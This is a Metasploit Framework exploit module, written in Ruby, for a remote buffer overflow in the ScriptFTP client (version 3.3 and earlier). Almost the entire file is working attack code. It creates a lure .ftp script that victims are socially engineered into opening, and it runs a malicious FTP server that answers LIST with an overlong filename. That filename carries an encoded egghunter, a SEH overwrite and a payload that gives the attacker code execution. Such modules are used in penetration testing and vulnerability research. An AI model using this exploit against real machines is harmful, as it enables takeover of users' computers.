##
# $Id: scriptftp_list.rb 13841 2011-10-09 05:36:42Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  # Module metadata for the ScriptFTP <= 3.3 LIST overflow.
  #
  # Two mixins cooperate here: FILEFORMAT produces the small ScriptFTP
  # script written in #setup, and FtpServer answers the client that runs
  # it with the listing built in #on_client_command_list.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)',
      'Description'    => %q{
        AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
        vulnerability that is triggered when processing a sufficiently long filename during
        a FTP LIST command resulting in overwriting the exception handler. Social engineering
        of executing a specially crafted ftp file by double click will result in connecting to
        our malcious server and perform arbitrary code execution which allows the attacker
        to gain the same rights as the user running ScriptFTP.
      },
      'License'        => MSF_LICENSE,
      'Version'        => "$Revision: 13841 $",
      'Author'         =>
        [
          'modpr0be',                                 # Vulnerability discovery and original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
          'mr_me <steventhomasseeley[at]gmail.com>',  # Metasploit module
        ],
      'References'     =>
        [
          #[ 'CVE', '?' ],
          #[ 'OSVDB', '?' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17876/' ],
          [ 'URL', 'http://www.kb.cert.org/vuls/id/440219' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'              => 'thread',
          'DisablePayloadHandler' => 'false',
        },
      'Payload'        =>
        {
          'BadChars'       => "\x00\xff\x0d\x5c\x2f\x0a",
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDI', # Egghunter jmp edi
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # CALL DWORD PTR SS:[EBP-4]
          # scriptftp.exe - File version=Build 3/9/2009
          [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 12 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp' ]),
      ], self.class)
  end

  # Writes the ScriptFTP script file, then defers to the mixin's setup.
  #
  # A wildcard SRVHOST cannot be written into the script, so in that case
  # the local address Rex selects for reaching 50.50.50.50 is used instead.
  def setup
    srvhost = datastore['SRVHOST']
    lhost = srvhost == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : srvhost

    # One ScriptFTP command per CRLF-terminated line.
    script = [
      "OPENHOST('#{lhost}','ftp','ftp')",
      "SETPASSIVE(ENABLED)",
      "GETLIST($list,REMOTE_FILES)",
      "CLOSEHOST"
    ].map { |line| "#{line}\r\n" }.join

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(script)
    super
  end

  # Any command the FtpServer mixin does not handle itself is acknowledged
  # unconditionally so the client keeps going until it issues LIST.
  #
  # @param c   client connection
  # @param cmd [String] the unrecognised command (unused)
  # @param arg [String] its argument (unused)
  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  # Answers LIST with a directory listing whose file name carries the
  # overflow: filler, encoded egghunter, filler up to the target offset,
  # the nSEH/SEH pair, a unicode-friendly alignment stub, more filler and
  # finally the egg holding the real payload.
  #
  # @param c   client control connection
  # @param arg [String] LIST argument (unused)
  def on_client_command_list(c, arg)
    conn = establish_data_connection(c)
    unless conn
      c.put("425 Can't build data connection\r\n")
      return
    end
    print_status(" - Data connection set up")

    c.put("150 Here comes the directory listing.\r\n")
    c.put("226 Directory send ok.\r\n")

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars,
      { :checksum => false, :eggtag => 'cure' })

    # The hunter goes through alpha_mixed first, then unicode_mixed; each
    # encoder is handed the buffer register listed next to it.
    getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
    [
      [ 'x86/alpha_mixed',   'EDX' ],
      [ 'x86/unicode_mixed', 'EAX' ], # aligned to ESP & EAX
    ].each do |name, reg|
      enc = framework.encoders.create(name)
      enc.datastore.import_options_from_hash({ 'BufferRegister' => reg })
      # NOTE: badchars were already eliminated, so none are passed here
      hunter = enc.encode(hunter, nil, nil, platform)
      # The hardcoded getpc stub is prepended after the alpha pass; the
      # unicode pass that follows encodes it along with the rest.
      hunter = getpc_stub + hunter if name =~ /alpha/
    end

    unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL
    nseh = "\x61" + unicode_nop
    seh  = target.ret
    # Every instruction is separated by the unicode nop.
    alignment = [
      "\x54",         # PUSH ESP
      "\x58",         # POP EAX
      "\x05\x12\x11", # ADD EAX,11001200
      "\x2d\x01\x01", # SUB EAX,1000100
      "\x2d\x01\x10", # SUB EAX,10000100
      "\x50",         # PUSH EAX
      "\xc3"          # RETN
    ].join(unicode_nop)

    buffer = rand_text_alpha(656)
    buffer << hunter
    buffer << rand_text_alpha(target['Offset'] - buffer.length)
    buffer << nseh << seh << alignment
    buffer << rand_text_alpha(500) << egg

    print_status(" - Sending directory list via data connection")
    listing = [
      "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt",
      " 5 ftpuser ftpusers 512 Jul 26 2001 A",
      "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt"
    ].map { |entry| "#{entry}\r\n" }.join
    conn.put(listing)
    conn.close
    nil # the original ended with a bare return
  end
end
